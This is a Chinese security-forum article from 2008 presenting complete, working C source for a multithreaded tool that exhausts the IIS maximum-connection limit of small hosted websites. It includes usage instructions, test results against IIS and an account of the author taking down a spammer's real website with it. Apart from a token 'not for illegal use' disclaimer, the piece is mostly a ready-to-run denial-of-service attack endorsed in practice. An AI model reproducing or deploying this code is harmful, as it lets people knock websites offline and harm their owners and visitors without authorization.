执着成就未来 技术成就梦想
文字横幅以及760*60黄金广告位置招租,欢迎恰谈! 广告业务联系QQ:8019399 声明:在本站所投放广告内容均与本站立场无关!

您现在的位置: 中国安全在线 >> 攻防技术 >> 技巧知识 >> 文章正文 用户登录 新用户注册
专 题 栏 目
最 新 热 门
最 新 推 荐
相 关 文 章
三步找回被删并清空了回收站的文件
新手想做网吧技术网管应会些什么
如何维护和优化局域网技巧
查看自己IP地址的四种方法
实战经验 组建维护一个30人局域网
巧用支付宝 免交手续费
教你防范QQ隐身被检测(图)
入侵Windows XP的几个常用方法
经验谈:跳板攻击入侵技术实例解析
上网被ISP劫持?介绍一些好用的DNS域
利用IIS最大连接数测试网站带宽
作者:佚名 来源:安全在线 更新时间:2008-6-11 18:14:15 【字体:
<%=(int(rnd()*1)+1)%>您当前的位置:中国安全在线cnsafer.com 请进入[技术论坛]发表评论

本程序仅做为技术交流之用,勿用于非法用途!
        最近买了个空间来玩,各位勿笑,是入门级的虚拟主机(偶是穷人啊),各种参数都相当低,特别是IIS连接数,只有100个(也就是同时支持100个不同的访问)。
        这里就出现问题了。如果我一直对该网站进行连接,虽然我是同一个人,但是IIS却傻乎乎的把每次连接当成不同的人,每连接一次就会分配一个session给我,当连接超过服务器设置的IIS最大连接数目的时候……呵呵,拒绝服务就发生了。
        具体的攻击嘛,我们当然是利用程序来完成。思路简单,就是不断的向网站发HTTP请求,直到超过它的最大连接数。正好机器上有以前看了shotgun的《HTTP协议Content Lenth限制漏洞导致拒绝服务攻击》写的测试程序,跟今天的要求很相似,就拿来改改咯。具体代码如下:
 

(VS.net 、XP SP1调试通过。编译好的程序可以在本文附件下载)


#include "winsock.h"
#include "stdio.h"
#include "string.h"
#include "io.h"
#pragma comment(lib,"ws2_32.lib")
#define BUFLEN 1024
#define MAXThreadCount 10 //设置最大线程数
 
int ThreadCount=0; 
 
struct mydata
{
  char *ip;
  int  port;
};
 
 
unsigned int resolve(char *name)
{
    struct hostent *he;
    unsigned int ip;
 
    if((ip=inet_addr(name))==(-1))
    {
        if((he=gethostbyname(name))==0)
            return 0;
        memcpy(&ip,he->h_addr,4);
    }
    return ip;
}
 
 
DWORD WINAPI Dos(LPVOID lpParam ) 

  mydata *csdn = (mydata*)lpParam;
  struct sockaddr_in server;
  server.sin_family = AF_INET;
  server.sin_port = htons(csdn->port);
   server.sin_addr.s_addr = resolve((char*)csdn->ip);
      if(server.sin_addr.s_addr==0)
    {
        
         printf("Don’t find  address %s\n",(char*)csdn->ip);
        exit(0);
    }
  int my;
  char buf[100]="POST / HTTP/1.1\r\nHost: ";
  strcat(buf,(char*)csdn->ip);
  strcat(buf," \r\nContent-Length: 10\r\n\r\n");
    my=socket(PF_INET,SOCK_STREAM,0);
  if(my==INVALID_SOCKET)
    {
         printf("ERROR");
         exit(0);
    }
if(connect(my,(struct sockaddr *) & server,sizeof(server))==SOCKET_ERROR)
    {
         printf("Socket ERROR:%d",GetLastError());
        exit(0);
    }
  if(send(my,buf,strlen(buf),0)==SOCKET_ERROR){printf("ERROR:send fail!");}
  ThreadCount--;
    return 0; 

 
void thread ( char *a1 , char *a2 , char *a3 )
{
  static mydata tmp;
  tmp.ip = a1;
  tmp.port = atoi(a2);
 
  DWORD dwThreadId;
    HANDLE hThread; 
  WSADATA ws;
   if   (WSAStartup( MAKEWORD(2,2), &ws )!=0)
   {
                printf(" [-] WSAStartup() error\n");
                exit(0);
   }
    hThread = CreateThread( 
        NULL,                        // no security attributes 
        0,                           // use default stack size  
        Dos,                  // thread function 
        &tmp,                // argument to thread function 
        0,                           // use default creation flags 
        &dwThreadId);                // returns the thread identifier 
   if (hThread == NULL) 
     printf( "CreateThread failed." ); 
  ThreadCount++;
  Sleep(200);     //延时,否则CPU会用满……
   CloseHandle(hThread);
}
 
int main(int argc, char* argv[])
{
  int i=0;
  if(argc!=4)
  {
         printf("\n\tIIS MaxConnectionCount DOS by lake2 ,Jul,8,2005\n");
         printf("-Usage:\n");
         printf("%s \n",argv[0]);
         printf("-Example: %s www.target.com 80 300\n",argv[0]);
         return 0;
  }
  printf("Starting DOS.............Ctrl + C break\n");
  while( i < atoi(argv[3]) )
  {
         if( ThreadCount < MAXThreadCount ){ thread(argv[1],argv[2],argv[3]); i++;}
  }
  while( 1 ){      }
  WSACleanup();
  return 0;

 

        程序为命令行程序,共有三个参数,依次为要攻击的网站域名、端口、连接数。嗯,测试下效果先。
测试的目标是个人电脑,系统为win2000。IIS管理中把最大连接数设为200,很快网站就不能访问了;增大到500,仍然会被当;800,还是要被当(图)。测试过程中该电脑正在运行魔兽世界,而且一直正常。看来我们的程序只是对付网站,不会央及无辜的啊^_^

        既然如此,那索性试试IIS连接数为无限的情况。程序中的连接参数我填的8000,结果运行途中我的系统没有了缓冲区间,winsock产生10055号错误,程序中止。呵呵,看来这种方法还是只能针对使用虚拟空间的中小网站。
        好,偶们来实际使用一下。打开邮箱,随便找封广告垃圾邮件,访问那家伙的网站,然后开始攻击它,对付这种小站连接数就设成300就绰绰有余了。呵呵,很快那网站就不工作了,嘿嘿,这可怪不得我,谁叫他发垃圾邮件在前。好了,测试完毕,通过验收,就不跟他玩了。

        这只是个测试程序,真正要投入到应用还得再完善完善。再说废话一句,要是跟别人没有国仇家恨的话还是不要DOS的好。

您对本文章有什么意见或着疑问吗?请到论坛讨论您的关注和建议是我们前行的参考和动力

文章录入:ls1238    责任编辑:ls1238 
  • 上一篇文章:

  • 下一篇文章:
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
    | 设为首页 | 加入收藏 | 联系方式 | 友 情链接 | 关于我们 | 网站留言 |
    Copyright ?2003-2008 www.cnsafer.com All Rights Reserved.
    如有意见请与我们联系 Email:admin#mail.cnsafer.com 联系QQ:8589101
    中国安全在线友情提示:建议使用IE6.0或以上版本, 分辩率1024*768进行浏览
    敢想 敢做 挑战自我 努力做最好 打造最优秀的新手成长 第一起跑线
    中网科技有限公司 技术支持 鄂ICP备05006475号